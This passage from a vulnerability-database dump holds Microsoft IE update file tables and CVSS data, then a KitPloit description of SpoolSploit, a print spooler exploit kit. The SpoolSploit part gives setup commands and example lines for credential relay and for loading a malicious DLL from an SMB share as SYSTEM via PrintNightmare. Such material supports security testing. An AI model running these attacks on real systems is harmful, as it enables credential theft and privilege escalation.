18:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 256,000 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:11| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 52,736 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:04| 11,776 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:03| 341,504 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 19:57| 221,184 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 310,784 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:18| 290,304 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 579,584 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 64,000 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,075,200 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 168,960 \nicrav03.rat| Not versioned| 20-Mar-2021| 20:54| 8,798 \nticrf.rat| Not versioned| 20-Mar-2021| 20:54| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 18:17| 228,232 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:44| 91,136 \nVGX.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 818,176 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,066,432 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,121,216 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,063,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,314,240 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,390,528 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,033,152 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,255,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,061,312 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,326,016 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,019,840 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,071,040 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,082,816 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,170,368 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,153,984 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,291,712 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,283,520 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,052,096 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,301,952 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,093,056 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,299,392 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,094,592 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,316,800 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,305,536 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,278,912 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,285,568 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,060,288 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,315,776 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,279,424 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,324,992 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,098,176 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,072 \nieinstal.exe| 11.0.9600.20112| 13-Aug-2021| 19:41| 475,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,184 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 35,328 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 37,888 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 27,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 33,792 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 23,040 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 22,016 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 31,232 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,816 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 32,256 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 30,720 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,384 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,896 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 16,896 \n \n### **Windows Server 2008**\n\n### \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,142,784 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 2:17| 751,512 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,427,968 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,132,544 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 75,776 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 2:05| 66,048 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 2:05| 63,488 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 678,912 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 354,304 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,744 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 607,744 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 1:40| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 1:40| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 41,472 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 10,752 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 11,776 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 2:08| 367,616 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 72,704 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 2:10| 12,845,056 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 2:05| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,232 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 195,072 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 194,560 \nExtExport.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 142,848 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 387,584 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 2:17| 142,744 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 769,024 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 231,936 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 2:07| 9,757,696 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 2:03| 176,640 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 474,624 \nInetRes.adml| Not versioned| 9-Sep-2021| 2:23| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 104,448 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 723,456 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 2:11| 1,819,648 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 434,176 \n \n### \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 3:16| 1,391,616 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 3:31| 757,656 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 3:15| 1,494,528 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 3:16| 1,395,200 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 97,280 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 3:15| 86,528 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 3:14| 76,800 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 887,808 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 452,608 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 281,600 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 729,088 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 2:48| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 2:48| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 55,296 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 3:14| 11,264 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 3:14| 12,800 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 3:19| 448,512 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 96,256 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 3:24| 18,812,416 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 3:14| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 223,744 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 550,912 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 173,056 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 499,200 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 3:31| 176,024 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 997,376 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 237,056 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 3:17| 10,944,000 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 3:12| 248,320 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 490,496 \nInetRes.adml| Not versioned| 9-Sep-2021| 3:37| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 141,312 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 3:15| 818,176 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 3:21| 2,358,784 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 3:15| 583,680 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 2:17| 751,512 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 142,848 \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,142,784 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,427,968 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,132,544 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 75,776 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 2:05| 66,048 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 2:05| 63,488 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 678,912 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 354,304 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,744 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 607,744 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 1:40| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 1:40| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 41,472 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 10,752 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 11,776 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 2:08| 367,616 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 72,704 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 2:10| 12,845,056 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 2:05| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,232 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 195,072 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 194,560 \nExtExport.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 22,528 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 387,584 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 2:17| 142,744 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 769,024 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 231,936 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 2:07| 9,757,696 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 2:03| 176,640 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 474,624 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 104,448 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 723,456 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 2:11| 1,819,648 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 434,176 \n \n## **Information about protection and security**\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## **References**\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mskb", "title": "KB5005563: Cumulative security update for Internet Explorer: September 14, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T07:00:00", "id": "KB5005563", "href": "https://support.microsoft.com/en-us/help/5005563", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-08-06T23:38:43", "description": "[](<https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/s1325/SpoolSploit_1_SpoolSploit-Usage.png>)\n\n \n\n\nA collection of Windows print spooler exploits containerized with other utilities for practical exploitation.\n\n \n\n\n**Summary** \n\n\nSpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account [credentials](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) to escalate privileges and execute malicious DLLs on [endpoints](<https://www.kitploit.com/search/label/Endpoints> \"endpoints\" ) with full system access.\n\n[](<https://1.bp.blogspot.com/-RH9Wnu2YiuQ/YVi9OZW06YI/AAAAAAAAvWg/V0vRolVeGJAW1XjzaLGce7zf532DLrrQACNcBGAsYHQ/s1325/SpoolSploit_1_SpoolSploit-Usage.png>)\n\n \n**Getting Started** \n\n\nAs of the release date the SpoolSploit Docker [container](<https://www.kitploit.com/search/label/Container> \"container\" ) has been tested successfully on the latest versions of `MacOS`, `Ubuntu Linux`, and `Windows 10`.\n\nAlthough not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a [virtual machine](<https://www.kitploit.com/search/label/Virtual%20Machine> \"virtual machine\" ) that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.\n\n \n**Create and access the SpoolSploit Docker container** \n\n\n 1. Clone this repository\n \n \n git clone https://github.com/BeetleChunks/SpoolSploit \n \n\n 2. Build the SpoolSploit Docker container image\n \n \n cd SpoolSploit \n sudo docker build -t spoolsploit . \n \n\n 3. Create and start the SpoolSploit Docker container\n \n \n sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest \n \n\n 4. Attach to the container\n \n \n sudo docker exec -it spoolsploit /bin/bash \n \n\n \n**Command-line Usage** \n\n \n \n usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD \n \n optional arguments: \n -h, --help show this help message and exit \n -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} \n Attack type to execute on target(s). \n -rH RHOST, --rhost RHOST \n Remote target IP, CIDR range, or filename (file:<path>) \n -rP {139,445}, --rport {139,445} \n Remote SMB server port. \n -lH LHOST, --lhost LHOST \n Listening hostname or IP \n -lS LSHARE, --lshare LSHARE \n Staging SMB share (UNC) \n -d DOMAIN, --domain DOMAIN \n Domain for authentication \n -u USER, --username USER \n Username for authentication \n -p PASSWD, --password PASSWD \n Password for authentication \n \n Example - spoolsample: \n python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 \n \n Example - nightmare: \n python3 spool_sploit.py -a nightmare -lS '\\\\10.14.1.24\\C$\\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 \n \n\n \n**SpoolSample - Capture and relay Windows machine account credentials** \n\n\nThe SpoolSploit Docker container includes [Responder](<https://github.com/lgandx/Responder> \"Responder\" ) for relaying machine account hashes obtained from executing the `spoolsample` attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.\n\n \n\n\n[](<https://1.bp.blogspot.com/-9iR_vZDcp-8/YVi9c9w_qrI/AAAAAAAAvWk/conVpwxj6zgRd1O4kRGrz-e5xu3jTjLLgCNcBGAsYHQ/s1483/SpoolSploit_2_SpoolSample.gif>)\n\n \n\n\n**PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM** \n\n\nIncluded in the SpoolSploit container is an SMB server implemented via [Impacket](<https://github.com/SecureAuthCorp/impacket> \"Impacket\" ). This server can be used to host 